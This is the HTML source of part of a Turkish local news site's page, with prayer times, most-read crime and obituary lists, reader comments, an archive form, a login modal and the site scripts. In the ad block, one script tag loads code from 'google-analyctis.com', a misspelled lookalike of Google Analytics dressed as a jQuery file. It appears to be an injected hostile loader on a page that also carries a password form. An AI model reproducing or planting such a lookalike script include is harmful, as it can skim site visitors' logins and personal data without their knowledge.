value="mardin" >Mardin</option> <option value="mersin" >Mersin</option> <option value="mugla" >Muğla</option> <option value="mus" >Muş</option> <option value="nevsehir" >Nevşehir</option> <option value="nigde" >Niğde</option> <option value="ordu" >Ordu</option> <option value="osmaniye" >Osmaniye</option> <option value="rize" >Rize</option> <option value="adapazari" >Sakarya</option> <option value="samsun" >Samsun</option> <option value="siirt" >Siirt</option> <option value="sinop" >Sinop</option> <option value="sivas" >Sivas</option> <option value="sanliurfa" >Şanlıurfa</option> <option value="sirnak" >Şırnak</option> <option value="tekirdag" >Tekirdağ</option> <option value="tokat" >Tokat</option> <option value="trabzon" >Trabzon</option> <option value="tunceli" >Tunceli</option> <option value="usak" >Uşak</option> <option value="van" >Van</option> <option value="yalova" >Yalova</option> <option value="yozgat" >Yozgat</option> <option value="zonguldak" >Zonguldak</option> </select> </div> <div class="content"> <div class="sonuc"> <table cellspacing="0" cellpadding="0" id="vakitler"> <tr> <th>İmsak</th> <th>Güneş</th> <th>Öğle</th> <th>İkindi</th> <th>Akşam</th> <th>Yatsı</th> </tr> <tr> <td>04:00</td> <td>05:34</td> <td>12:43</td> <td>16:31</td> <td>19:43</td> <td>21:10</td> </tr> </table> </div> </div> </div> <div class="reklam reklam208"><iframe name=BIKADV src="http://medya.ilan.gov.tr/widgets/YYN-001260-20160610.html" width="300" height="175" frameborder="0" scrolling="no"></iframe> <script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script></div><a href="http://www.accuweather.com/tr/tr/elbistan/318373/current-weather/318373" class="aw-widget-legal"> <!-- By accessing and/or using this code snippet, you agree to AccuWeather’s terms and conditions (in English) which can be found at http://www.accuweather.com/en/free-weather-widgets/terms and AccuWeather’s Privacy Statement (in English) which can be found at http://www.accuweather.com/en/privacy. --> </a><div id="awtd1452737033699" class="aw-widget-36hour" data-locationkey="318373" data-unit="c" data-language="tr" data-useip="false" data-uid="awtd1452737033699" data-editlocation="false"></div><script type="text/javascript" src="http://oap.accuweather.com/launch.js"></script> <!-- ENCOKLAR --> <div class="encoklar"> <div class="accordion"> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne"> <span class="encoklar-icon"><i class="halflings-icon white fire"></i></span><h5>Bu Ay Çok Okunanlar</h5></a> </div> <div id="collapseOne" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/guncel/3-gundur-kayip-olan-engelli-vatandasin-cansiz-bedeni-bulundu-h67283.html" title="3 gündür kayıp olan engelli vatandaşın..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/07/3_gundur_aranan_engelli_vatandas_aycicegi_tarlasinda_olu_bulundu_h67283_1d1e1.jpg" alt="3 gündür kayıp olan engelli vatandaşın..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/3-gundur-kayip-olan-engelli-vatandasin-cansiz-bedeni-bulundu-h67283.html" title="" ><span class="en-hit">1.</span> <strong>3 gündür kayıp olan engelli vatandaşın...</strong> <span class="en-spot en-hidden">Elbistan&#039;da 3 gündür kayıp olarak aranan 42 yaşındaki konuşma...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/elbistanda-sopa-ve-kesici-aletlerin-kullanildigi-kavga-kanli-bitti-1-olu-h67296.html" title="Elbistanda sopa ve kesici aletlerin..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/07/elbistanda_sopa_ve_kesici_aletlerin_kullanildigi_kavga_kanli_bitti_1_olu_h67296_6360a.jpg" alt="Elbistanda sopa ve kesici aletlerin..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/elbistanda-sopa-ve-kesici-aletlerin-kullanildigi-kavga-kanli-bitti-1-olu-h67296.html" title="" ><span class="en-hit">2.</span> <strong>Elbistan’da sopa ve kesici aletlerin...</strong> <span class="en-spot en-hidden">Elbistan’da çıkan tartışmanın sopa ve kesici aletlerin kullanıldığı...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/pompali-tufekle-vurulan-adam-hayatini-kaybetti-h67130.html" title="Pompalı tüfekle vurulan adam hayatını..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/07/pompali_tufekle_vurulan_adam_hayatini_kaybetti_h67130_dc8a1.jpg" alt="Pompalı tüfekle vurulan adam hayatını..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/pompali-tufekle-vurulan-adam-hayatini-kaybetti-h67130.html" title="" ><span class="en-hit">3.</span> <strong>Pompalı tüfekle vurulan adam hayatını...</strong> <span class="en-spot en-hidden">Elbistan’da, tartıştığı kişi tarafından pompalı tüfekle vurulan...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/elbistanda-bicakli-ve-silahli-kavga-1-olu-2-yarali-h67096.html" title="Elbistanda bıçaklı ve silahlı..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/07/elbistanda_bicakli_ve_silahli_kavga_1_olu_2_yarali_h67096_567ee.JPG" alt="Elbistanda bıçaklı ve silahlı..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/elbistanda-bicakli-ve-silahli-kavga-1-olu-2-yarali-h67096.html" title="" ><span class="en-hit">4.</span> <strong>Elbistan’da bıçaklı ve silahlı...</strong> <span class="en-spot en-hidden">Elbistan’da şehir merkezinde henüz belirlenemeyen bir sebeple başlayan...</span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/oya-gunalmis-38-yasinda-h67177.html" title="Oya Günalmış 38 yaşında," class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/07/oya_gunalmis_38_yasinda_h67177_c0f70.jpg" alt="Oya Günalmış 38 yaşında," ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/oya-gunalmis-38-yasinda-h67177.html" title="" ><span class="en-hit">5.</span> <strong>Oya Günalmış 38 yaşında,</strong> <span class="en-spot en-hidden"></span></a></div></li> </ul> </div> </div> </div> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo"> <span class="encoklar-icon"><i class="halflings-icon white comments"></i></span><h5>Bu Ay Çok Yorumlananlar</h5></a> </div> <div id="collapseTwo" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/vefatlar/ahmet-duran-cakmak-90-yasinda-h67194.html" title="Ahmet Duran Çakmak 90 Yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/07/ahmet_duran_cakmak_90_yasinda_h67194_b4e1b.jpg" alt="Ahmet Duran Çakmak 90 Yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/ahmet-duran-cakmak-90-yasinda-h67194.html" title="" ><span class="en-hit">1.</span> <strong>Ahmet Duran Çakmak 90 Yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/eyyup-sahin-54-yasinda-h67253.html" title="Eyyüp Şahin 54 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/07/eyyup_sahin_54_yasinda_h67253_0c98a.jpg" alt="Eyyüp Şahin 54 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/eyyup-sahin-54-yasinda-h67253.html" title="" ><span class="en-hit">2.</span> <strong>Eyyüp Şahin 54 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/recep-dal-50-yasinda-h67141.html" title="Recep Dal 50 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/07/recep_dal_50_yasinda_h67141_38d18.jpg" alt="Recep Dal 50 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/recep-dal-50-yasinda-h67141.html" title="" ><span class="en-hit">3.</span> <strong>Recep Dal 50 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/baskan-sahin-kahvehane-ve-cay-ocagi-esnafi-oyun-mujdesi-bekliyor-h67100.html" title="Başkan Şahin: Kahvehane ve çay..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/07/baskan_sahin_kahvehane_ve_cay_ocagi_esnafi_oyun_mujdesi_bekliyor_h67100_48260.jpg" alt="Başkan Şahin: Kahvehane ve çay..."></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/baskan-sahin-kahvehane-ve-cay-ocagi-esnafi-oyun-mujdesi-bekliyor-h67100.html" title="" ><span class="en-hit">4.</span> <strong>Başkan Şahin: “Kahvehane ve çay...</strong> <span class="en-spot en-hidden">Başkan Şahin, oyun oynanmasına izin verilmediği için esnafın yalnızca...</span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/emin-doganay-64-yasinda-h67156.html" title="Emin Doğanay 64 yaşında," class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/07/emin_doganay_64_yasinda_h67156_24251.jpg" alt="Emin Doğanay 64 yaşında,"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/emin-doganay-64-yasinda-h67156.html" title="" ><span class="en-hit">5.</span> <strong>Emin Doğanay 64 yaşında,</strong> <span class="en-spot en-hidden"></span></a></div></li> </ul> </div> </div> </div> </div> </div> <!-- SON YORUMLAR --> <div class="sayfalar"> <div class="header"> <h5>Son Yorumlar</h5> </div> <div class="content"> <ul class="unstyled"> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-mustafa-colak-h67343.html#comment_310187" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-hasim-orta-h67346.html#comment_310186" title="" >Rabbim rahmetiyle muamele etsin mekanını...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/bakan-soylu-en-yogun-koronavirus-denetimini-gerceklestirecegiz-h67347.html#comment_310185" title="" >birlikte yaşama kültürü zayıf.bencillik...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/ingiltere-vizesi-almak-mumkun-h14944.html#comment_310184" title="" >ahmet bey Ben ingiterede yasiyorum .turkiyede...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hatice-ceran-h67352.html#comment_310183" title="" >ALLAH RAHMET eylesin mekanı Cennet olsun....</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/bpet-yalcin-petrol-yenilenen-yuzuyle-hizmette-h67350.html#comment_310182" title="" >Hayırlı olsun</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hatice-ceran-h67352.html#comment_310181" title="" >Allah rahmet mekanı cennet olsun</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hatice-ceran-h67352.html#comment_310179" title="" >MERHUMA ALLAHTAN RAHMET,SEVENLERİNE BAŞ...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hatice-ceran-h67352.html#comment_310178" title="" >Merhumeye Allah tan rahmet geride kalanlara...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/akif-karakas-55-yasinda-h67333.html#comment_310177" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hatice-ceran-h67352.html#comment_310176" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/bpet-yalcin-petrol-yenilenen-yuzuyle-hizmette-h67350.html#comment_310174" title="" >Kalite ve ğüleryüz her zaman kazanır...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hatice-ceran-h67352.html#comment_310173" title="" >Allah rahmet eylesin. Mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hatice-ceran-h67352.html#comment_310172" title="" >Merhumeye Allah&#39;tan rahmet ailesine...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/karahasanli-hayirsever-isadami-kapidereye-cami-yaptiriyor-h67319.html#comment_310171" title="" >Hayırlı olsun. Gençlerin iş bulmak için...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hatice-ceran-h67352.html#comment_310170" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hatice-ceran-h67352.html#comment_310166" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-mustafa-colak-h67343.html#comment_310165" title="" >MEKÂNI CENNET OLSUN</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hatice-ceran-h67352.html#comment_310164" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li> <li class="last"><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/leyla-topsakal-92-yasinda-h67320.html#comment_310162" title="" >Mekanı cennet olsun! Kalanlarının başı...</a></li> </ul> </div> </div> <!-- ARSIV --> <div class="arsiv"> <div class="header"> <h5>Arşiv</h5> </div> <div class="content"> <form action="http://www.elbistaninsesi.com/?m=arsiv" method="post" name="arsiv" > <select name="gun" class="day span1"> <option value="01" >01</option> <option value="02" >02</option> <option value="03" >03</option> <option value="04" >04</option> <option value="05" >05</option> <option value="06" selected>06</option> <option value="07" >07</option> <option value="08" >08</option> <option value="09" >09</option> <option value="10" >10</option> <option value="11" >11</option> <option value="12" >12</option> <option value="13" >13</option> <option value="14" >14</option> <option value="15" >15</option> <option value="16" >16</option> <option value="17" >17</option> <option value="18" >18</option> <option value="19" >19</option> <option value="20" >20</option> <option value="21" >21</option> <option value="22" >22</option> <option value="23" >23</option> <option value="24" >24</option> <option value="25" >25</option> <option value="26" >26</option> <option value="27" >27</option> <option value="28" >28</option> <option value="29" >29</option> <option value="30" >30</option> <option value="31" >31</option> </select> <select name="ay" class="month span1"> <option value="01" >Ocak</option> <option value="02" >Şubat</option> <option value="03" >Mart</option> <option value="04" >Nisan</option> <option value="05" >Mayıs</option> <option value="06" >Haziran</option> <option value="07" >Temmuz</option> <option value="08" selected>Ağustos</option> <option value="09" >Eylül</option> <option value="10" >Ekim</option> <option value="11" >Kasım</option> <option value="12" >Aralık</option> </select> <select name="yil" class="year span1"> <option value="2020" selected>2020</option> <option value="2019" >2019</option> <option value="2018" >2018</option> <option value="2017" >2017</option> <option value="2016" >2016</option> </select> <button type="submit" class="btn btn-default pull-right">Ara</button> </form> </div> </div> </div> </div> <!-- Sol Dikey Reklam --> <div class="reklam dikey sol" style="width:px;height:px;"> </div> <!-- Sağ Dikey Reklam --> <div class="reklam dikey sag ortala" style="width:160px;height:532px;"> <p style="width:160px;"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- kaynarca --> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3633419220222736" data-ad-slot="5807534991" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></p> </div> </div> <!-- FOOTER --> <div id="siteFooter" class="footer"> <div class="row-fluid"> <div class="container center"> <div class="span4"> <div>Copyright © 2020 - Tüm hakları saklıdır.<br>Elbistanın Sesi</div> <div class="footer-social"> <a href="http://facebook.com/elbistaninsesi" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/facebook_circle-32.png" alt="FACEBOOK"></a> <a href="http://twitter.com/elbistaninsesi" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/twitter_circle-32.png" alt="TWITTER"></a> <a href="https://www.instagram.com/elbistaninsesi_/" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/ins-ico.png" width="32" height="32" /> <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/google_circle-32.png" alt="GOOGLE PLUS"></a> <a href="http://www.elbistaninsesi.com/rss"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/rss_circle-32.png" alt="RSS"></a> </div> </div> <div class="span4 text-center"> <div class="footer-logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_1.jpg" alt="Anma/ Haşim ORTA" /></a></div> </div> <div class="span4"> <p><center> 0 (344) 415 04 15 <br> elbistaninsesigazetesi@gmail.com <br>Kızılcaoba Mah. Kışla Cad. 19/1</center> </p> <p class="site-info glyphicons earphone">0 (344) 415 04 15</p> </div> </div> </div> <div id="footer-alt" class="row-fluid"> <div class="container center"> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/m/" class="footer-alt-mobil glyphicons iphone"><strong>Mobil</strong>Mobil siteyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/kunye.html" class="footer-alt-reklam glyphicons global"><strong>Künye</strong>Künyeyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/iletisim.html" class="footer-alt-iletisim glyphicons headset"><strong>İletişim</strong>Bize ulaşın.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="#" class="footer-alt-iletisim glyphicons embed_close"><strong>Sitene Ekle</strong>Güncel haberleri ekleyin.</a></div> </div> </div> </div> <div class="row-fluid"> <div class="container center"> <div class="span12 text-center"> <p>Bu sitede yayınlanan tüm materyalin her hakkı mahfuzdur. Kaynak gösterilse bile gazetemizin izni olmadan yayınlanamaz.</p> <p><a href="http://www.haber-sistemi.com" title="Haber Scripti">Haber Scripti</a> | <a href="http://www.tebilisim.com" title="TE Bilişim" target="_blank">TE Bilişim<br> </div> </div> </div> <div id="top" class="btn btn-inverse">Yukarı Çık</div> </div> <div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Üye Girişi</h3> </div> <div class="modal-body"> <form class="form-horizontal" action="http://www.elbistaninsesi.com/index.php?m=login&rd=http%3A%2F%2Fwww.elbistaninsesi.com%2Fvefatlar%2Fanma-hasim-orta-h67346.html" method="post"> <div class="control-group"> <label class="control-label" for="inputName">Kullanıcı Adı</label> <div class="controls"> <input id="inputName" value="" name="kullanici" type="text" placeholder="Kullanıcı Adı" required> </div> </div> <div class="control-group"> <label class="control-label" for="inputPassword">Şifre</label> <div class="controls"> <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required> </div> </div> <div class="control-group"> <div class="controls"> <button type="submit" class="btn btn-info">Giriş Yap</button> </div> </div> </form> </div> <div class="modal-footer"> <a href="http://www.elbistaninsesi.com/uyelik.html" class="pull-left btn">Üye Ol</a> <a href="http://www.elbistaninsesi.com/unuttum.html" class="pull-left btn">Şifremi unuttum?</a> <button class="btn btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button> </div> </div> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery-1.9.1.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/modernizr.custom.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/classie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/uisearch.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/login.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.showbizpro.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cookie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.mousewheel.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.scrollbar.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cycle.all.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/base.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/waypoints.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/sticky.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/comments.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.pKisalt.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/getshares.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment-tr.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.elevateZoom-3.0.8.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/system-min.js"></script> <script type="text/javascript">	new UISearch( document.getElementById( 'sb-search' ) );	$(function(){	});	$("#comment_list .text").pKisalt();	var gsTitle = document.querySelectorAll(".gs-title")[0].innerHTML;	var gsSpace = ' ';	var gsUrl = location.href;	new GetShare({ root: $(".gs-facebook"), network: "facebook", share: { }	});	new GetShare({ root: $(".gs-twitter"), network: "twitter", share: { message:gsTitle+gsSpace+gsUrl }	});	new GetShare({ root: $(".gs-google"), network: "googleplus", share: { }	});	new GetShare({ root: $(".gs-linkedin"), network: "linkedin", share: { }	});	jQuery('#anasayfayazar').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[4,4,4,4],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"off",	delay:4000,	speed:750	});	jQuery('#gununmansetleri').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[6,6,6,6],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"on",	delay:4000,	speed:750	});	$('#haber > .page-header').waypoint(function(direction) { $('#article-finished').toggleClass('hiding', direction === "up");	}, { offset: function() { return $.waypoints('viewportHeight') - $(this).height() - 750; }	});	function addLink() { var kisa_site_adi = "Elbistanın Sesi"; var kopyala_imza_onu = "Kaynak: http://www.elbistaninsesi.com"; var body_element = document.getElementsByTagName('body')[0]; var selection; selection = window.getSelection(); var pagelink = "<br><br>" + kopyala_imza_onu + "<a href='"+document.location.href+"'>"+document.location.href+"</a><br><br>" + kisa_site_adi; var copytext = selection + pagelink; var newdiv = document.createElement('div'); newdiv.style.position='absolute'; newdiv.style.left='-99999px'; body_element.appendChild(newdiv); newdiv.innerHTML = copytext; selection.selectAllChildren(newdiv); window.setTimeout(function() { body_element.removeChild(newdiv); },0);	}	document.oncopy = addLink;	tebilisim('67346', 'haber', ''); </script> <!-- Google Analytics --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', analitik_ga, 'auto'); ga('send', 'pageview'); </script> <!-- End Google Analytics --> <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async='async'></script> <script> var OneSignal = window.OneSignal || [];	OneSignal.push(["init", {	appId: "51fe1034-635b-4e70-859b-1fc8dff5f28d",	autoRegister: true,	subdomainName: 'elbistaninsesi',	setDefaultNotificationUrl: 'http://www.elbistaninsesi.com/',	notifyButton: { enable: false	},	/*	welcomeNotification: { "title": "Hoş geldiniz", "message": "Bildirimlerimize üye olduğunuz teşekkür ederiz.",	},	*/ promptOptions: { actionMessage: "Sondakika haberlerimizi anında öğrenebilmek için bildirimleri kabul edin!", acceptButtonText: "ABONE OL", cancelButtonText: "İSTEMİYORUM", autoAcceptTitle: '"İzin ver" butonuna tıklayın', exampleNotificationCaption: '(istediğin zaman aboneliğini iptal edebilirsin)', } }]); </script> </body> </html> 